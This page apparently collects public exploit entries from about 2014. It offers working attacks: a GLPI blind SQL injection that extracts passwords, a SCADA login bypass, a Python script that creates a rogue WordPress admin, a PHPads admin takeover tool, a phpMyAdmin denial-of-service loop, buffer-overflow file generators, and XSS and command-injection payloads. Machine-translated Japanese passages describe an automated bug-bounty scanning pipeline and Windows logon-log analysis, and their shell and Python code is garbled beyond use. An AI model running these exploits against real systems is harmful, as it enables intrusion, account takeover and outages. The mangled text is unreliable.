# Exploit Title: GLPI 0.85 Blind SQL Injection
# Date: 28-11-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
# CVE: CVE-2014-9258
# Category: webapps
1. Description
$_GET['condition'] is not escaped correctly.
File: ajax\getDropdownValue.php
if (isset($_GET['condition']) && !empty($_GET['condition'])) {
$_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
}
if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
$where .= " AND ".$_GET['condition']." ";
}
$query = "SELECT `$table`.* $addselect
FROM `$table`
$addjoin
$where
ORDER BY $add_order `$table`.`completename`
$LIMIT";
if ($result = $DB->query($query)) {
}
http://security.szurek.pl/glpi-085-blind-sql-injection.html
2. Proof of Concept
http://glpi-url/ajax/getDropdownValue.php?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)
3. Solution:
Update to version 0.85.1
http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863112139
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
0x01説明
今回使用されているプラットフォームは次のとおりです。https://Chaos.ProjectDiscovery.io/は、主要な外国の抜け穴バウンティプラットフォームを収集します。現在、資産尺度は約1600 0000〜1800 0000であり、これはひどい数であり、1時間ごとに増加または減少しています。これは、多くのサードパーティの自己構築バウンティプラットフォームとつながります。これは、独自のプラットフォームで収集するものよりも多く、掘削の可能性も高くなります。
0x02自動化ソリューションプロセス
スクリプトを使用して、Project-Discoveryプラットフォームのすべての資産を取得します。資産偵察と収集は、Project -Discoveryに引き渡されます。ダウンロードされた資産を最後のマスタードメインデータと比較し、新しい資産が現在表示されているかどうかを決定します。ある場合は、新しい資産を抽出し、一時ファイルを作成し、MasterDomainに新しい資産を追加します。 NAABUを使用してポートスキャンに使用し、オープンポートを使用して検証し、HTTPXを使用して検証し、HTTP生存資産を抽出し、脆弱性スキャンのためにHTTP生存資産を核に送信し、Xrayにも送信します。デフォルトでは、Xrayの基本的なCrawler関数を使用して、一般的な脆弱性をスキャンします。 Xrayのスキャン結果をXray-New-$(日付+%f-%t).htmlに保存します。Webhookモードを追加して、Nucleiの脆弱性スキャン結果を同時にプッシュし、Notifyを使用してリアルタイムをプッシュすることもできます。これらはすべて自動的に実行されます。
0x03準備
最初にこれらのツールをインストールし、ソフトリンクをセットアップし、グローバルに使用できます。これらのツールのインストールは非常に簡単で、もう説明されません。 Githubにはインストールチュートリアルもあります
CENTOS7+ 64ビット構成4H 4G [ONE SERVER] CHAOSPY [ASSET検出、資産ダウンロード] https://Github.com/photonbolt/Chaospyunzip [Filter Duplication] https://github.com/tomnomnom/anewnaabu [ポートスキャン]からhttps://github.com/projectdiscovery/naabuhttpx [サバイバル検出] https://github.com/projectdiscovery/httpxnuclei [脆弱性スキャン] https://Nuclei.projectdiscovery.io/xray [wulnerability scan] 333333339downowdolow.xlay通知]通知[脆弱性通知] Notifyの比較的成熟したプッシュソリューションサーバーは、Vultrを推奨しています。私の推奨リンク:https://www.vultr.com/?ref=9059107-8hを使用できます
0x04通知通知関連の構成について
インストールと構成の通知:https://github.com/projectdiscovery/notify
構成ファイル(それなしでこのファイルを作成):/root/.config/notify/provider-config.yaml
通知構成を変更するだけです。たとえば、私が使用する通知は電報と電子メールです(任意のものを構成できます)
テスト結果
Subfinder -D Hackerone.com |通知-Provider Telegram
電報通知を設定しています。実行が完了した後、結果を受信できる場合、通知に問題はありません。次のステップを踏むことができます
0x05展開プロセス
上記のツールがインストールされていることを確認してください。次に、SHスクリプトファイルを作成しましょう。このスクリプトは、上記のすべてのプロセスを実行しました。
名前: wadong.sh、実行許可を追加:chmod +xwadong.sh
wadong.shスクリプトは、主に資産偵察資産の収集、ポートスキャン、重複排出検出、生存の検出、脆弱性スキャン、結果通知の機能を完了します
スクリプト:
#!/bin/bash
#chaospyを使用して、バウンティアセットデータのみをダウンロードします
#python3 chaospy.py - download-hackerone
#python3 chaospy.py - download-rewards#すべてのバウンティアセットをダウンロードします
#。/chaospy.py - download-bugcrowdダウンロードbugcrowdアセット
#。/chaospy.py - download-hackeroneハッケロン資産をダウンロードします
#。/chaospy.py - download-intigriti intigritiアセットをダウンロードします
#。/chaospy.py - download-externalダウンロード自立型資産
#。/chaospy.py - download-swagsダウンローダーSWAGSアセット
#。/chaospy.py - download-rewardsは、報酬のある資産をダウンロードします
#。/chaospy.py - download-norewardsは、報酬なしでアセットをダウンロードします
#ダウンロードされたものをデッレスし、awkを使用して結果を最後の結果と比較し、新しいものがあるかどうかを確認します
ls |の場合grep '.zip' /dev /null;それから
unzip '*.zip' /dev /null
cat *.txt新聞
rm -f *.txt
awk 'nr==fnr {lines [$ 0]; next}!($ 0 in line)' alltargets.txtls新方an.mddomains.txtls
RM -F新規Dains.md
######################################################################## ############################################################################## ############################################################################## ##############################################################################
Echo 'Asset Scout End $(日付+%f-%t)' | Notify -Silent -Provider Telegram
echo '新しいドメイン$(wc -l domains.txtls)' |を見つけますNotify -Silent -Provider Telegram
######################################################################## ############################################################################## ############################################################################## ############################################################################## ############################################################################## ############################################################################## ############################################################################## ##############################################################################
核- シレント - 摂取
核- シレント-UT
rm -f *.zip
それ以外
echo '新しいプログラムは見つかりません' | Notify -Silent -Provider Telegram
fi
[-s domains.txtls]; thenの場合
echo 'naabu'を使用して新しいアセットポートをスキャンします '| Notify -Silent -Provider Telegram
fine_line=$(cat domains.txtls | wc -l)
num=1
k=10000
j=true
f=0
$ j
する
echo $ fine_line
if [$ num -lt $ fine_line]; then
m=$(($ num+$ k))
sed -n '' $ num '、' $ m'p 'domains.txtls domaint.txtls
((num=num+$ m))
naabu -stats -l domain.txtls -p 80,443,8080,2053,2087,2096,8443,2083,2086,2095,880,2052,2082,3443,8791 、8887,8888,444,9443,2443,100,10001,8082,8444,200,8081,8445,8446,8447 -silent -o open -domain.txtls /dev /null |エコー「ポートスキャン」
Echo 'ポートスキャンの終了、HTTPXの使用を開始して生存を検出します' | Notify -Silent -Provider Telegram
httpx -silent -stats -l open -domain.txtls -fl 0 -mc 200,302,403,404,204,303,400,401 -o newurls.txtls /dev /null
echo 'httpxは、生存している資産$(wc -l newurls.txtls)を見つけました' | Notify -Silent -Provider Telegram
cat newurls.txtls new-active-$(date +%f-%t).txt#save new Asset Record
cat domaint.txtls alltargets.txtls
エコー '生き残った資産の存在は、履歴キャッシュ$(日付+%f-%t)に追加されました| Notify -Silent -Provider Telegram
echo '核の使用を開始して新しい資産をスキャンします」| Notify -Silent -Provider Telegram
cat newurls.txtls | Nuclei -RL 300 -BS 35 -C 30 -MHE 10 -NI -O RES -ALL -VULNERABITY -RESULTS.TXT -STATS -SILENT -SILENT CRITICAL、MEID、HIGH、LOW | Notify -Silent -Provider Telegram
echo 'Nucleiの脆弱性スキャンは終了しました' | Notify -Silent -Provider Telegram
#Use Xrayスキャン、Webhookを一致させることを忘れないで、そうでない場合はこのアイテムを削除して、ファイルに保存します
#echo 'Xrayを使用して新しい資産をスキャンします' | Notify -Silent -Provider Telegram
#xray_linux_amd64 webscan -url-file newurls.txtls -webhook-output http://www.qq.com/webhook -html-output xray-new-$(date +%f-%t).html
#echo 'Xrayの脆弱性スキャンが終了しました。サーバーに移動して、Xrayの脆弱性レポートを表示してください '| Notify -Silent -Provider Telegram
rm -f open -domain.txtls
rm -f domaint.txtls
rm -f newurls.txtls
それ以外
echo 'ssss'
j=false
sed -n '' $ num '、' $ find_line'p 'domains.txtls domain.txtls
naabu -stats -l domain.txtls -p 80,443,8080,2053,2087,2096,8443,2083,2086,2095,880,2052,2082,3443,8791 、8887,8888,444,9443,2443,100,10001,8082,8444,200,8081,8445,8446,8447 -silent -o open -domain.txtls /dev /null |エコー「ポートスキャン」
Echo 'ポートスキャンの終了、HTTPXの使用を開始して生存を検出します' | Notify -Silent -Provider Telegram
httpx -silent -stats -l open -domain.txtls -fl 0 -mc 200,302,403,404,204,303,400,401 -o newurls.txtls /dev /null
echo 'httpxは、生存している資産$(wc -l newurls.txtls)を見つけました' | Notify -Silent -Provider Telegram
cat newurls.txtls new-active-$(date +%f-%t).txt#save new Asset Record
cat domaint.txtls alltargets.txtls
エコー '生き残った資産の存在は、履歴キャッシュ$(日付+%f-%t)に追加されました| Notify -Silent -Provider Telegram
echo '核の使用を開始して新しい資産をスキャンします」| Notify -Silent -Provider Telegram
cat newurls.txtls | Nuclei -RL 300 -BS 35 -C 30 -MHE 10 -NI -O RES -ALL -VULNERABITY -RESULTS.TXT -STATS -SILENT -SILENT CRITICAL、MEID、HIGH、LOW | Notify -Silent -Provider Telegram
echo 'Nucleiの脆弱性スキャンは終了しました' | Notify -Silent -Provider Telegram
#Use Xrayスキャン、Webhookを一致させることを忘れないで、そうでない場合はこのアイテムを削除して、ファイルに保存します
#echo 'Xrayを使用して新しい資産をスキャンします' | Notify -Silent -Provider Telegram
#xray_linux_amd64 webscan -url-file newurls.txtls -webhook-output http://www.qq.com/webhook -html-output xray-new-$(date +%f-%t).html
#echo 'Xrayの脆弱性スキャンが終了しました。サーバーに移動して、Xrayの脆弱性レポートを表示してください '| Notify -Silent -Provider Telegram
rm -f open -domain.txtls
rm -f domaint.txtls
rm -f newurls.txtls
fi
終わり
rm -f domains.txtls
それ以外
######################################################################## ######################################################################結果を送信して、新しいドメインが見つからないかどうかを通知します
echo '新しいドメイン$(日付+%f-%t)' | Notify -Silent -Provider Telegram
fi
First.shファイルを構築すると、スクリプトは1回しか実行できず、将来使用されません。主に初めて履歴キャッシュドメインを生成するために使用され、古い資産としてマークされます。
実行許可を追加:Chmod +x First.sh
#!/bin/bash
#chaospyを使用して、バウンティアセットデータのみをダウンロードします
./Chaospy.py - download-new
./ChaOspy.py - download-rewards
#ダウンロードされたものを提示します
ls |の場合grep '.zip' /dev /null;それから
unzip '*.zip' /dev /null
rm -f alltargets.txtls
cat *.txt alltargets.txtls
rm -f *.txt
rm -f *.zip
echo 'ドメイン$(wc -l alltargets.txtls)を見つけて、キャッシュファイルalltargets.txtとして保存されます'
FI
0x06バウンティオートメーションを開始
上記のすべてのツールがインストールされていることを確認するとき
1.最初の.shスクリプトを実行して、十分なキャッシュドメイン名をローカルに生成し、古い資産としてマークする
./first.sh2、bbautomation.shスクリプトのループ実行、3600秒スリープ、1時間に1回、つまりスクリプト
Xunhuan.sh:
#!/bin/bashwhile true; do ./wadong.sh; sleep 3600; DONE3.CHAOSPYスクリプトは、遅延スキャン時間とエラーレポートを最適化するために大まかに変更されました。 '\ 033 [34m'magenta=' \ 033 [35m'cyan='\ 033 [36M'lightgray=' \ 033 [37m'darkgray='\ 033 [90m'lightred=' \ 033 [91m'lightgreen='\ 033 [92m'lighty olly=' \ 033] '\ 033 [93m'lightblue=' \ 033 [94M'lightmagenta='\ 033 [95m'lightcyan=' \ 033 [96M'White='\ 033 [97M'Default=' \ 033 [0M'Banner='' '' ' `/__ \/___////////////////////////////////////////////////////////(__)_____//////////////\ ___、//////////////////////////////____ /%s prociddisに基づいて書かれた小さなツール。 https://Chaos.ProjectDiscovery.io/%s *著者-Moaaz(https://TWITTER.com/photonbo1t)*%s \ n '' '%(lightgreen、yellow、darkgray、darkgray、default)parser=argperse.argumentparser(説明=' chaospyys tool ')parser.add_argument(' - list '、dest=' list '、help=' list All programs '、action=' store_true ')parser.add_argument(' - list-bugcrowd '、dest=' list_bugcrowd '、help=' list bugcrowdプログラム '、action=' store_true ')parser.add_argument(' - list-hackerone '、dest=' list_hackerone '、help=' list hackeroneプログラム '、action=' store_true ')parser.add_argument(' - list-intigriti '、dest_intigriti'、heat='list intigritiプログラム '、action=' store_true ')parser.add_argument(' - list-external '、dest=' list_external '、help=' list selfホストプログラム '、action=' store_true ')parser.add_argument(' - list-swags '、dest=' dest_swags '、help=' help='swagsオファー '、action=' store_true ')parser.add_argument(' - list-rewards '、dest=' list_rewards '、help=' list programs with rewards '、action=' store_true ')parser.add_argument(' - list-norewards '、dest=' dest='list_norewards'、help='listプログラム報酬'、action=' store_true ')parser.add_argument(' - list-new '、dest=' list_new '、help=' listプログラム、action='store_true')parser.add_argument( ' - list-new'、dest='list_new'、help='list newプログラム '、action=' store_true ')parser.add_argument(' - list-updated '、dest
Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit
Vendor: Soitec
Product web page: http://www.soitec.com
Affected version: 1.4 and 1.3
Summary: Soitec power plants are a profitable and ecological investment
at the same time. Using Concentrix technology, Soitec offers a reliable,
proven, cost-effective and bankable solution for energy generation in the
sunniest regions of the world. The application shows how Concentrix technology
works on the major powerplants managed by Soitec around the world. You will
be able to see for each powerplant instantaneous production, current weather
condition, 3 day weather forecast, Powerplant webcam and Production data history.
Desc: Soitec SmartEnergy web application suffers from an authentication bypass
vulnerability using SQL Injection attack in the login script. The script fails
to sanitize the 'login' POST parameter allowing the attacker to bypass the security
mechanism and view sensitive information that can be further used in a social
engineering attack.
Tested on: nginx/1.6.2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Vendor status:
[16.11.2014] Vulnerability discovered.
[02.12.2014] Vendor contacted.
[08.12.2014] Vendor responds asking more details.
[08.12.2014] Sent details to the vendor.
[09.12.2014] Vendor confirms the vulnerability.
[12.12.2014] Vendor applies fix to version 1.4.
[14.12.2014] Coordinated public security advisory released.
Advisory ID: ZSL-2014-5216
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php
16.11.2014
---
POST /scada/login HTTP/1.1
Host: smartenergy.soitec.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smartenergy.soitec.com/scada/login
Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
# EAX 0012E508
# ECX 43434343
# EDX 00000000
# EBX 43434343
# ESP 0012E4A4
# EBP 0012E4F4
# ESI 0012E508
# EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + junk)
f.close()
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
# EAX 0012E788
# ECX 43434343
# EDX 00000000
# EBX 43434343
# ESP 0012E724
# EBP 0012E774
# ESI 0012E788
# EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.lst",'w')
f.write(buffer + nseh + seh + junk)
f.close()
# jaangle 0.98i.977 Denial of Service Vulnerability
# Author: hadji samir , s-dz@hotmail.fr
# Download : http://www.jaangle.com/downloading?block
# Tested : Windows 7 (fr)
# DATE : 2012-12-13
#
###################################################################
EAX 000000C0
ECX 00000000
EDX 00000000
EBX 00000003
ESP 01C5FE28
EBP 01C5FF88
ESI 00000002
EDI 002B4A98
EIP 776964F4 ntdll.KiFastSystemCallRet
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDC000(8000)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
#!/usr/bin/python
buff = ("\x41" * 30000 )
f = open("exploit.m3u",'w')
f.write( buff )
f.close()
#!/usr/bin/python
#
# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
#
# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
#
# Exploit written by Claudio Viviani
#
#
# 2014-12-03: Discovered vulnerability
# 2014-12-04: Patch released (2.7.5)
#
# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
#
# function wpdm_ajax_call_exec()
# {
# if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
# if (function_exists($_POST['execute']))
# call_user_func($_POST['execute'], $_POST);
# else
# echo "function not defined!";
# die();
# }
# }
#
# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
#
# if (function_exists($_POST['execute']))
# call_user_func($_POST['execute'], $_POST);
# else
# ...
# ...
# ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
# (mixed) (required) An array of user data, stdClass or WP_User object.
# Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wordpress-download"
#
# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | ______ |__| __ __
|::.|:. | | _ \ .-----.--.--.--.-----| .-----.---.-.--| |
`--- ---' |. | \| _ | | | | | | _ | _ | _ |
|. | |_____|________|__|__|__|_____|___._|_____|
|: 1 / ___ ___
|::.. . / | Y .---.-.-----.---.-.-----.-----.----.
`------' |. | _ | | _ | _ | -__| _|
|. \_/ |___._|__|__|___._|___ |_____|__|
|: | | |_____|
|::.|:. |
`--- ---'
Wordpress Download Manager
R3m0t3 C0d3 Ex3cut10n
(Add WP Admin)
v2.7.0-2.7.4
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
username = id_generator()
pwd = id_generator()
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
'execute' : 'wp_insert_user',
'user_login' : username,
'user_pass' : pwd,
'role' : 'administrator'})
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
print "[+] Tryng to connect to: "+host
try:
req = urllib2.Request(host+"/", body, headers)
response = urllib2.urlopen(req)
html = response.read()
if html == "":
print("[!] Account Added")
print("[!] Location: "+host+"/wp-login.php")
print("[!] Username: "+username)
print("[!] Password: "+pwd)
else:
print("[X] Exploitation Failed :(")
except urllib2.HTTPError as e:
print("[X] "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))
<title> PHPads Authentication Bypass Exploit </title>
<pre>
PHPads Authentication Bypass / Administrator Password Change Exploit
<form method="POST">
Target : <br><input type="text" name="target" value="<? if($_POST['target']) {echo $_POST['target']; }else{echo 'http://localhost:4545/phpads';} ?>" size="70" /><br /><input type="submit" name="submit" />
</form>
<?php
function catchya($string, $start, $end)
{
preg_match('/'.$start.'(.*)'.$end.'/', $string, $matches);
return $matches[1];
}
function login($target)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target."/ads.dat");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
$username = catchya($result, "user=", "\n");
$password = catchya($result, "pass=", "\n");
return array($username,$password);
curl_close($ch);
}
function adminchange($target, $username, $password)
{
$post = array('save' => '1',
'newlogin' => $username,
'newpass' => "htlover");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_COOKIE, 'user='.$username.'; pass='.$password);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
$result = curl_exec($ch);
if(preg_match("/Code Generator/", $result))
{
return "<br><br><font color=green>Success !! Password changed </font><br>username: ".$username." | password: htlover";
}else{
return "Something wrong <br>";
}
curl_close($ch);
}
if (isset($_POST['submit']))
{
$target = $_POST['target'];
//login($target, $username, $userid);
$logins = login($target);
echo "USERNAME :" . $logins[0]; // username
echo "<br>PASSWORD :" . $logins[1]; // password
echo adminchange($target.'/admin.php?action=config', $logins[0], $logins[1]);
}
?>
</pre>
=============
DESCRIPTION:
=============
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to
cause a denial of service (resource consumption) via a long password.
CVE-2014-9218 was assigned
=============
Time Line:
=============
December 3, 2014 - A phpMyAdmin update and the security advisory is
published.
=============
Proof of Concept:
=============
*1 - Create the payload.*
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
{1..1000000} >> payload
*2 - Performing the Denial of Service attack.*
$ for i in `seq 1 150`; do (curl --data @payload
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
=============
Authors:
=============
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============
References:
====================================================================
*
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php
1。概要
1.1ケース
最初に2つの写真を見てみましょう。これらの2つの写真を見ると、これが成功したログインであること、そのタイプはネットワークログインを表す3であり、4624はほとんどの人の場合に成功することを意味します。それで、実際にそれはどうですか?ここには特定のあいまいさがあります。今日は、ここで詳細な詳細を同期します。
1.2原則
ユーザーがSMBプロトコルを使用して接続すると、ユーザーにパスワードを求めると、匿名ユーザー(つまり、匿名ユーザー)を使用してSMBネットワークを接続し、ネットワークが成功した接続として記録されると使用します。次の条件により、このログが生成されます。
ログインユーザーは匿名です
ログインプロセスはNTLMSSPです
使用法プロトコルはNTLM V1です
ログインプロトコルはSMBです
2。テスト
2.1 SMB接続障害
2.1.1ネットワーク名が見つからない/アクセス拒否
ネット使用を直接使用して、存在しないAAA $の接続を開始し、ネットワーク名が見つからないというエラーが報告されます。正味使用を使用すると、その接続が成功していないこともわかります。
しかし、ログを見てみましょう。ログインを成功させるために4624タイプ3のログを生成することがわかります。これは、匿名のユーザーがネットワーク
に正常にログインしたことを意味します
正しいディレクトリパスを使用しますが、ユーザーを入力しないと、エラーが報告され、アクセスが拒否されます。また、このステータスにより、匿名のユーザーが正常にログインします。タイプ3
2.1.2誤ったユーザー名またはパスワード
誤ったアカウントパスワードでログインすると、ユーザー名またはパスワードが正しくないと報告されます。
この場合、ログに匿名のログイン成功ログはありませんが、4625ログが直接表示され、もちろんログインされたユーザー名も表示されます。
2.2 SMBログインに正常に
ログインに正しいアカウントの秘密を使用している場合、ログでどのように機能しますか?
タイプ3のログインが成功したことに加えて、4776(検証資格情報)と4672(ログイン許可割り当て)があります。
3。要約
攻撃者がSMBを使用して接続する場合、アクセスパスが存在しない場合、またはアカウントが存在しない場合、匿名ユーザー(匿名ユーザー)の4624ログが生成されます。
4624は、必ずしも攻撃者が正常にログインすることを意味するわけではありません。 IPフィールド、TargetUserフィールド、ユーザー、その他多くのフィールドを組み合わせて、ログコンテキストを調べる必要があります。システム認証は4624の高いアラームを生成することがあります(上記のフィールドは意味を表しますが、特定のフィールド名は複雑であり、明確に記憶することはできません)
Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Injection Vulnerabilities
Author: Adler Freiheit
Discovered: 11 June 2014
Updated: 11 December 2014
Published: 11 December 2014
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 6.4.5976 and prior
Status: Unpatched
Vulnerable scripts:
/pages/themes.php
/pages/preview.php
/pages/help.php
/pages/search.php
/pages/user_password.php
/pages/user_request.php
(and probably others)
Description:
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL
injection attacks, and insecure cookie handling. The scripts fail to
properly sanitize user-supplied input, check the network protocol used
to access the site.
Vulnerability: SC1414
Name: Cross Site Scripting (XSS)
Type: Application
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 6 Oct 2014
Service: tcp/https:443
Severity: 4
Risk: 40
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
Resolution Effort: 3
Description:
This web application is vulnerable to Cross Site Scripting (XSS).
XSS is caused when an application echoes user controllable input data
back to the browser without first sanitising or escaping dangerous
characters. Unescaped strings are then interpreted or executed by the
browser as script, just as if they had originated from the web server.
Malicious script is sent by the attacker via the vulnerable web
application and executed on the victims browser, within the context of
that user and may be used to steal session information, redirect users
to a malicious site, and even steal credentials in a Phishing attack.
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
http://cwe.mitre.org/data/definitions/79.html
Solution:
Validate all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) against expected Type,
Length and where possible, Format and Range characteristics. Reject
any data that fails validation.
Sanitise all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) by converting potentially
dangerous characters (listed below) into HTML entities such as > < etc
using output encoding.
By combining proper input validation with effective input sanitisation
and output encoding, Cross Site Scripting vulnerabilities will be
mitigated.
[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)
[9] / (forward slash)
[10] | (pipe)
[11] [] (square brackets)
[12] : (colon)
Information
URI: /pages/preview.php
Parameter: sort (GET)
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>
Vulnerability: 44967
Name: CGI Generic Command Execution (timebased)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5
Description:
The remote web server hosts CGI scripts that fail to adequately
sanitize request strings. By leveraging this issue, an attacker may be
able to execute arbitrary commands on the remote host.
Note that this script uses a timebased detection method which is less
reliable than the basic method.
Solution:
Restrict access to the vulnerable application. Contact the
vendor for a patch or upgrade.
Information:
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to arbitrary command
execution (time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%26%20ping%20n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20n%203%20127.0.0.1%20%26
